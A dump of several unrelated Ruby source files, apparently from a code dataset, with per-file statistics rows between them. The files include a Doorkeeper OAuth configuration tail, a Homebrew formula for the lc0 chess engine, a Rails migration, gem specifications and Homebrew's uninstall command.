# use_polymorphic_resource_owner
# If you are planning to use Doorkeeper in Rails 5 API-only application, then you might
# want to use API mode that will skip all the views management and change the way how
# Doorkeeper responds to a requests.
#
# api_only
# Enforce token request content type to application/x-www-form-urlencoded.
# It is not enabled by default to not break prior versions of the gem.
#
# enforce_content_type
# Authorization Code expiration time (default: 10 minutes).
#
# authorization_code_expires_in 10.minutes
# Access token expiration time (default: 2 hours).
# If you want to disable expiration, set this to `nil`.
#
# access_token_expires_in 2.hours
# Assign custom TTL for access tokens. Will be used instead of access_token_expires_in
# option if defined. In case the block returns `nil` value Doorkeeper fallbacks to
# +access_token_expires_in+ configuration option value. If you really need to issue a
# non-expiring access token (which is not recommended) then you need to return
# Float::INFINITY from this block.
#
# `context` has the following properties available:
#
# `client` - the OAuth client application (see Doorkeeper::OAuth::Client)
# `grant_type` - the grant type of the request (see Doorkeeper::OAuth)
# `scopes` - the requested scopes (see Doorkeeper::OAuth::Scopes)
#
# custom_access_token_expires_in do |context|
# context.client.application.additional_settings.implicit_oauth_expiration
# end
# Use a custom class for generating the access token.
# See https://doorkeeper.gitbook.io/guides/configuration/other-configurations#custom-access-token-generator
#
# access_token_generator '::Doorkeeper::JWT'
# The controller +Doorkeeper::ApplicationController+ inherits from.
# Defaults to +ActionController::Base+ unless +api_only+ is set, which changes the default to
# +ActionController::API+. The return value of this option must be a stringified class name.
# See https://doorkeeper.gitbook.io/guides/configuration/other-configurations#custom-base-controller
#
# base_controller 'ApplicationController'
# Reuse access token for the same resource owner within an application (disabled by default).
#
# This option protects your application from creating new tokens before old valid one becomes
# expired so your database doesn't bloat. Keep in mind that when this option is `on` Doorkeeper
# doesn't updates existing token expiration time, it will create a new token instead.
# Rationale: https://github.com/doorkeeper-gem/doorkeeper/issues/383
#
# You can not enable this option together with +hash_token_secrets+.
#
# reuse_access_token
# In case you enabled `reuse_access_token` option Doorkeeper will try to find matching
# token using `matching_token_for` Access Token API that searches for valid records
# in batches in order not to pollute the memory with all the database records. By default
# Doorkeeper uses batch size of 10 000 records. You can increase or decrease this value
# depending on your needs and server capabilities.
#
# token_lookup_batch_size 10_000
# Set a limit for token_reuse if using reuse_access_token option
#
# This option limits token_reusability to some extent.
# If not set then access_token will be reused unless it expires.
# Rationale: https://github.com/doorkeeper-gem/doorkeeper/issues/1189
#
# This option should be a percentage(i.e. (0,100])
#
# token_reuse_limit 100
# Only allow one valid access token obtained via client credentials
# per client. If a new access token is obtained before the old one
# expired, the old one gets revoked (disabled by default)
#
# When enabling this option, make sure that you do not expect multiple processes
# using the same credentials at the same time (e.g. web servers spanning
# multiple machines and/or processes).
#
# revoke_previous_client_credentials_token
# Hash access and refresh tokens before persisting them.
# This will disable the possibility to use +reuse_access_token+
# since plain values can no longer be retrieved.
#
# Note: If you are already a user of doorkeeper and have existing tokens
# in your installation, they will be invalid without enabling the additional
# setting `fallback_to_plain_secrets` below.
#
# hash_token_secrets
# By default, token secrets will be hashed using the
# +Doorkeeper::Hashing::SHA256+ strategy.
#
# If you wish to use another hashing implementation, you can override
# this strategy as follows:
#
# hash_token_secrets using: '::Doorkeeper::Hashing::MyCustomHashImpl'
#
# Keep in mind that changing the hashing function will invalidate all existing
# secrets, if there are any.
# Hash application secrets before persisting them.
#
# hash_application_secrets
#
# By default, applications will be hashed
# with the +Doorkeeper::SecretStoring::SHA256+ strategy.
#
# If you wish to use bcrypt for application secret hashing, uncomment
# this line instead:
#
# hash_application_secrets using: '::Doorkeeper::SecretStoring::BCrypt'
# When the above option is enabled, and a hashed token or secret is not found,
# you can allow to fall back to another strategy. For users upgrading
# doorkeeper and wishing to enable hashing, you will probably want to enable
# the fallback to plain tokens.
#
# This will ensure that old access tokens and secrets
# will remain valid even if the hashing above is enabled.
#
# fallback_to_plain_secrets
# Issue access tokens with refresh token (disabled by default), you may also
# pass a block which accepts `context` to customize when to give a refresh
# token or not. Similar to +custom_access_token_expires_in+, `context` has
# the following properties:
#
# `client` - the OAuth client application (see Doorkeeper::OAuth::Client)
# `grant_type` - the grant type of the request (see Doorkeeper::OAuth)
# `scopes` - the requested scopes (see Doorkeeper::OAuth::Scopes)
#
# use_refresh_token
# Provide support for an owner to be assigned to each registered application (disabled by default)
# Optional parameter confirmation: true (default: false) if you want to enforce ownership of
# a registered application
# NOTE: you must also run the rails g doorkeeper:application_owner generator
# to provide the necessary support
#
# enable_application_owner confirmation: false
# Define access token scopes for your provider
# For more information go to
# https://doorkeeper.gitbook.io/guides/ruby-on-rails/scopes
#
optional_scopes 'user/*.read', 'user/*.write', 'user/*.*'
# Allows to restrict only certain scopes for grant_type.
# By default, all the scopes will be available for all the grant types.
#
# Keys to this hash should be the name of grant_type and
# values should be the array of scopes for that grant type.
# Note: scopes should be from configured_scopes (i.e. default or optional)
#
# scopes_by_grant_type password: [:write], client_credentials: [:update]
# Forbids creating/updating applications with arbitrary scopes that are
# not in configuration, i.e. +default_scopes+ or +optional_scopes+.
# (disabled by default)
#
enforce_configured_scopes
# Change the way client credentials are retrieved from the request object.
# By default it retrieves first from the `HTTP_AUTHORIZATION` header, then
# falls back to the `:client_id` and `:client_secret` params from the `params` object.
# Check out https://github.com/doorkeeper-gem/doorkeeper/wiki/Changing-how-clients-are-authenticated
# for more information on customization
#
# client_credentials :from_basic, :from_params
# Change the way access token is authenticated from the request object.
# By default it retrieves first from the `HTTP_AUTHORIZATION` header, then
# falls back to the `:access_token` or `:bearer_token` params from the `params` object.
# Check out https://github.com/doorkeeper-gem/doorkeeper/wiki/Changing-how-clients-are-authenticated
# for more information on customization
#
# access_token_methods :from_bearer_authorization, :from_access_token_param, :from_bearer_param
# Forces the usage of the HTTPS protocol in non-native redirect uris (enabled
# by default in non-development environments). OAuth2 delegates security in
# communication to the HTTPS protocol so it is wise to keep this enabled.
#
# Callable objects such as proc, lambda, block or any object that responds to
# #call can be used in order to allow conditional checks (to allow non-SSL
# redirects to localhost for example).
#
# force_ssl_in_redirect_uri !Rails.env.development?
#
# force_ssl_in_redirect_uri { |uri| uri.host != 'localhost' }
# Specify what redirect URI's you want to block during Application creation.
# Any redirect URI is whitelisted by default.
#
# You can use this option in order to forbid URI's with 'javascript' scheme
# for example.
#
# forbid_redirect_uri { |uri| uri.scheme.to_s.downcase == 'javascript' }
# Allows to set blank redirect URIs for Applications in case Doorkeeper configured
# to use URI-less OAuth grant flows like Client Credentials or Resource Owner
# Password Credentials. The option is on by default and checks configured grant
# types, but you **need** to manually drop `NOT NULL` constraint from `redirect_uri`
# column for `oauth_applications` database table.
#
# You can completely disable this feature with:
#
# allow_blank_redirect_uri false
#
# Or you can define your custom check:
#
# allow_blank_redirect_uri do |grant_flows, client|
# client.superapp?
# end
# Specify how authorization errors should be handled.
# By default, doorkeeper renders json errors when access token
# is invalid, expired, revoked or has invalid scopes.
#
# If you want to render error response yourself (i.e. rescue exceptions),
# set +handle_auth_errors+ to `:raise` and rescue Doorkeeper::Errors::InvalidToken
# or following specific errors:
#
# Doorkeeper::Errors::TokenForbidden, Doorkeeper::Errors::TokenExpired,
# Doorkeeper::Errors::TokenRevoked, Doorkeeper::Errors::TokenUnknown
#
# handle_auth_errors :raise
# Customize token introspection response.
# Allows to add your own fields to default one that are required by the OAuth spec
# for the introspection response. It could be `sub`, `aud` and so on.
# This configuration option can be a proc, lambda or any Ruby object responds
# to `.call` method and result of it's invocation must be a Hash.
#
# custom_introspection_response do |token, context|
# {
# "sub": "Z5O3upPC88QrAjx00dis",
# "aud": "https://protected.example.net/resource",
# "username": User.find(token.resource_owner_id).username
# }
# end
#
# or
#
# custom_introspection_response CustomIntrospectionResponder
# Specify what grant flows are enabled in array of Strings. The valid
# strings and the flows they enable are:
#
# "authorization_code" => Authorization Code Grant Flow
# "implicit" => Implicit Grant Flow
# "password" => Resource Owner Password Credentials Grant Flow
# "client_credentials" => Client Credentials Grant Flow
#
# If not specified, Doorkeeper enables authorization_code and
# client_credentials.
#
# implicit and password grant flows have risks that you should understand
# before enabling:
# http://tools.ietf.org/html/rfc6819#section-4.4.2
# http://tools.ietf.org/html/rfc6819#section-4.4.3
#
grant_flows %w[authorization_code]
# Allows to customize OAuth grant flows that +each+ application support.
# You can configure a custom block (or use a class respond to `#call`) that must
# return `true` in case Application instance supports requested OAuth grant flow
# during the authorization request to the server. This configuration +doesn't+
# set flows per application, it only allows to check if application supports
# specific grant flow.
#
# For example you can add an additional database column to `oauth_applications` table,
# say `t.array :grant_flows, default: []`, and store allowed grant flows that can
# be used with this application there. Then when authorization requested Doorkeeper
# will call this block to check if specific Application (passed with client_id and/or
# client_secret) is allowed to perform the request for the specific grant type
# (authorization, password, client_credentials, etc).
#
# Example of the block:
#
# ->(flow, client) { client.grant_flows.include?(flow) }
#
# In case this option invocation result is `false`, Doorkeeper server returns
# :unauthorized_client error and stops the request.
#
# @param allow_grant_flow_for_client [Proc] Block or any object respond to #call
# @return [Boolean] `true` if allow or `false` if forbid the request
#
# allow_grant_flow_for_client do |grant_flow, client|
# # `grant_flows` is an Array column with grant
# # flows that application supports
#
# client.grant_flows.include?(grant_flow)
# end
# If you need arbitrary Resource Owner-Client authorization you can enable this option
# and implement the check your need. Config option must respond to #call and return
# true in case resource owner authorized for the specific application or false in other
# cases.
#
# Be default all Resource Owners are authorized to any Client (application).
#
# authorize_resource_owner_for_client do |client, resource_owner|
# resource_owner.admin? || client.owners_whitelist.include?(resource_owner)
# end
# Hook into the strategies' request & response life-cycle in case your
# application needs advanced customization or logging:
#
# before_successful_strategy_response do |request|
# puts "BEFORE HOOK FIRED! #{request}"
# end
#
# after_successful_strategy_response do |request, response|
# puts "AFTER HOOK FIRED! #{request}, #{response}"
# end
# Hook into Authorization flow in order to implement Single Sign Out
# or add any other functionality. Inside the block you have an access
# to `controller` (authorizations controller instance) and `context`
# (Doorkeeper::OAuth::Hooks::Context instance) which provides pre auth
# or auth objects with issued token based on hook type (before or after).
#
# before_successful_authorization do |controller, context|
# Rails.logger.info(controller.request.params.inspect)
#
# Rails.logger.info(context.pre_auth.inspect)
# end
#
# after_successful_authorization do |controller, context|
# controller.session[:logout_urls] <<
# Doorkeeper::Application
# .find_by(controller.request.params.slice(:redirect_uri))
# .logout_uri
#
# Rails.logger.info(context.auth.inspect)
# Rails.logger.info(context.issued_token)
# end
# Under some circumstances you might want to have applications auto-approved,
# so that the user skips the authorization step.
# For example if dealing with a trusted application.
#
# skip_authorization do
# true
# end
# Configure custom constraints for the Token Introspection request.
# By default this configuration option allows to introspect a token by another
# token of the same application, OR to introspect the token that belongs to
# authorized client (from authenticated client) OR when token doesn't
# belong to any client (public token). Otherwise requester has no access to the
# introspection and it will return response as stated in the RFC.
#
# Block arguments:
#
# @param token [Doorkeeper::AccessToken]
# token to be introspected
#
# @param authorized_client [Doorkeeper::Application]
# authorized client (if request is authorized using Basic auth with
# Client Credentials for example)
#
# @param authorized_token [Doorkeeper::AccessToken]
# Bearer token used to authorize the request
#
# In case the block returns `nil` or `false` introspection responses with 401 status code
# when using authorized token to introspect, or you'll get 200 with { "active": false } body
# when using authorized client to introspect as stated in the
# RFC 7662 section 2.2. Introspection Response.
#
# Using with caution:
# Keep in mind that these three parameters pass to block can be nil as following case:
# `authorized_client` is nil if and only if `authorized_token` is present, and vice versa.
# `token` will be nil if and only if `authorized_token` is present.
# So remember to use `&` or check if it is present before calling method on
# them to make sure you doesn't get NoMethodError exception.
#
# You can define your custom check:
#
# allow_token_introspection do |token, authorized_client, authorized_token|
# if authorized_token
# # customize: require `introspection` scope
# authorized_token.application == token&.application ||
# authorized_token.scopes.include?("introspection")
# elsif token.application
# # `protected_resource` is a new database boolean column, for example
# authorized_client == token.application || authorized_client.protected_resource?
# else
# # public token (when token.application is nil, token doesn't belong to any application)
# true
# end
# end
#
# Or you can completely disable any token introspection:
#
# allow_token_introspection false
#
# If you need to block the request at all, then configure your routes.rb or web-server
# like nginx to forbid the request.
# WWW-Authenticate Realm (default: "Doorkeeper").
#
# realm "Doorkeeper"
end
| 42.195876 | 109 | 0.739262 |
7ab3aaa2f3c6117aef12edcfd0638e258616a721 | 70 | require "env-dependencies/railtie"
require "env-dependencies/version"
| 23.333333 | 34 | 0.828571 |
e2b4c0619284b22d45bb6814518e88542f9a209b | 1,427 | class Lc0 < Formula
desc "Open source neural network based chess engine"
homepage "https://lczero.org/"
url "https://github.com/LeelaChessZero/lc0.git",
:tag => "v0.26.0",
:revision => "09edc73cf177f5f1d00e54549b6fa491e0507b56"
license "GPL-3.0"
revision 1
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "468c173bd7435f97d516b9b4fb1817402a807de7f918a1683747b03fd8885d8c" => :catalina
sha256 "c39b2e6a6c154e7a82c358faa46ff878ef6334e9e58638a550baef78a6fe0db1" => :mojave
sha256 "7db068bc2f8104a9fa487e91ff06add704d2c491b1894a343fa6d8bc39a8b0e6" => :high_sierra
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "[email protected]" => :build # required to compile .pb files
resource "network" do
url "https://training.lczero.org/get_network?sha=00af53b081e80147172e6f281c01daf5ca19ada173321438914c730370aa4267", :using => :nounzip
sha256 "12df03a12919e6392f3efbe6f461fc0ff5451b4105f755503da151adc7ab6d67"
end
def install
system "meson", *std_meson_args, "-Dgtest=false", "--buildtype", "release", "build/release"
cd "build/release" do
system "ninja", "-v"
libexec.install "lc0"
end
bin.write_exec_script libexec/"lc0"
libexec.install resource("network")
end
test do
assert_match /^bestmove e2e4$/,
shell_output("lc0 benchmark --backend=blas --nodes=1 --num-positions=1")
end
end
| 31.711111 | 138 | 0.728101 |
bbde92f8260bf5a2491a3eab0d67a1339ed715e5 | 330 | class CreateProjects < ActiveRecord::Migration
def change
create_table :projects do |t|
t.string :name
t.references :user, index: true
t.float :latitude
t.float :longitude
t.float :sqft
t.string :street
t.string :city
t.string :state
t.string :country
end
end
end
| 20.625 | 46 | 0.621212 |
79f271f0e0de5f4fe4c6bcfe5e0049c367b7a1f2 | 1,021 | require_relative '../../../spec_helper'
class CoreConceptPage < CoreAuthorityPage
include Logging
include Page
include CollectionSpacePages
DEPLOYMENT = Deployment::CORE
def display_name_input(index); input_locator([fieldset(CoreConceptData::CONCEPT_TERMS.name, index)], CoreConceptData::TERM_DISPLAY_NAME.name) end
def display_name_add_btn; add_button_locator([fieldset(CoreConceptData::CONCEPT_TERMS.name)]) end
def enter_display_name(name, index)
logger.debug "Entering display name '#{name}'"
wait_for_element_and_type(display_name_input(index), name)
end
def verify_display_name(name, index)
wait_until(Config.short_wait, "Expected display name '#{name}', but got '#{element_value(display_name_input index)}'") do
text_values_match?(name, element_value(display_name_input index))
end
end
def enter_number_and_text(data)
enter_acquisition_ref_num data
enter_acquisition_note data
end
def enter_number(data)
enter_acquisition_ref_num data
end
end | 30.939394 | 147 | 0.77669 |
21be54a7f032aab1e65986dad2bb61fcbe25a791 | 122 | module Consumer
module Postgres
module Controls
Identifier = Consumer::Controls::Identifier
end
end
end
| 15.25 | 49 | 0.713115 |
2181530dde90ff6d4e87e2be8322c263cad505a9 | 288 | require 'mkmf'
dir_config('bsdiff')
fail unless have_header('unistd.h')
fail unless have_header('bzlib.h')
fail unless have_library('bz2')
fail unless have_func('BZ2_bzWrite','bzlib.h')
fail unless have_macro('BZ_OK','bzlib.h')
create_header('bsdiff_config.h')
create_makefile('bsdiff')
| 26.181818 | 46 | 0.770833 |
87baaadbfa942650d2ed55163455fc0fdcb4abd5 | 652 | # -*- encoding: utf-8 -*-
# stub: pyu-ruby-sasl 0.0.3.3 ruby lib
Gem::Specification.new do |s|
s.name = "pyu-ruby-sasl"
s.version = "0.0.3.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Stephan Maka", "Ping Yu"]
s.date = "2010-10-18"
s.description = "Simple Authentication and Security Layer (RFC 4422)"
s.email = "[email protected]"
s.homepage = "http://github.com/pyu10055/ruby-sasl/"
s.rubygems_version = "2.2.2"
s.summary = "SASL client library"
s.installed_by_version = "2.2.2" if s.respond_to? :installed_by_version
end
| 32.6 | 105 | 0.679448 |
21e4e1cc17c906f5e670418123f26b83ea3b8f77 | 153 | require File.expand_path('../../../spec_helper', __FILE__)
describe "Kernel#protected_methods" do
it "needs to be reviewed for spec completeness"
end
| 25.5 | 58 | 0.751634 |
6a27971b1eee9e90a3e9e5316ea25c8433b6f95c | 92 | # desc "Explaining what the task does"
# task :active_preview do
# # Task goes here
# end
| 18.4 | 38 | 0.695652 |
d569324f6f457bde2c00802457ac4575e40726c7 | 209 | # frozen_string_literal: true
class AddOverviewAndDescriptionToTopic < ActiveRecord::Migration[5.0]
def change
add_column :topics, :overview, :text
add_column :topics, :description, :text
end
end
| 23.222222 | 69 | 0.760766 |
87812a42a3eaacd97522ee34d855e67e73a4d54c | 644 | Gem::Specification.new do |spec|
spec.name = "web-under-construction"
spec.version = "0.1.1"
spec.authors = ["Farid Nizam"]
spec.email = ["[email protected]"]
spec.summary = "Website Under Construction Jekyll theme."
spec.homepage = "https://github.com/yuimatcha/web-under-construction"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r!^(assets|_layouts|_includes|_config\.yml)!i) }
spec.add_runtime_dependency "jekyll", "~> 4.2.0"
spec.add_runtime_dependency "jekyll-seo-tag", "~> 2.7.1"
end | 40.25 | 126 | 0.597826 |
1cd0a1755308d56cb5117fdce05a4ef930677274 | 553 | class UserMailer < ApplicationMailer
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.account_activation.subject
#
def account_activation(user)
@user = user
mail to: user.email, subject: "Account activation"
end
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.password_reset.subject
#
def password_reset(user)
@user = user
mail to: user.email, subject: "Password reset"
end
end
| 22.12 | 65 | 0.707052 |
62092376dbb52d106419fbd70ec9ca0bbc1b993c | 1,765 | #: * `uninstall`, `rm`, `remove` [`--force`] <formula>:
#: Uninstall <formula>.
#:
#: If `--force` is passed, and there are multiple versions of <formula>
#: installed, delete all installed versions.
require "keg"
require "formula"
require "migrator"
module Homebrew
def uninstall
raise KegUnspecifiedError if ARGV.named.empty?
if !ARGV.force?
ARGV.kegs.each do |keg|
keg.lock do
puts "Uninstalling #{keg}... (#{keg.abv})"
keg.unlink
keg.uninstall
rack = keg.rack
rm_pin rack
if rack.directory?
versions = rack.subdirs.map(&:basename)
verb = versions.length == 1 ? "is" : "are"
puts "#{keg.name} #{versions.join(", ")} #{verb} still installed."
puts "Remove them all with `brew uninstall --force #{keg.name}`."
end
end
end
else
ARGV.named.each do |name|
rack = Formulary.to_rack(name)
name = rack.basename
if rack.directory?
puts "Uninstalling #{name}... (#{rack.abv})"
rack.subdirs.each do |d|
keg = Keg.new(d)
keg.unlink
keg.uninstall
end
end
rm_pin rack
end
end
rescue MultipleVersionsInstalledError => e
ofail e
puts "Use `brew uninstall --force #{e.name}` to remove all versions."
ensure
# If we delete Cellar/newname, then Cellar/oldname symlink
# can become broken and we have to remove it.
if HOMEBREW_CELLAR.directory?
HOMEBREW_CELLAR.children.each do |rack|
rack.unlink if rack.symlink? && !rack.resolved_path_exists?
end
end
end
def rm_pin(rack)
Formulary.from_rack(rack).unpin rescue nil
end
end
| 26.742424 | 78 | 0.583569 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.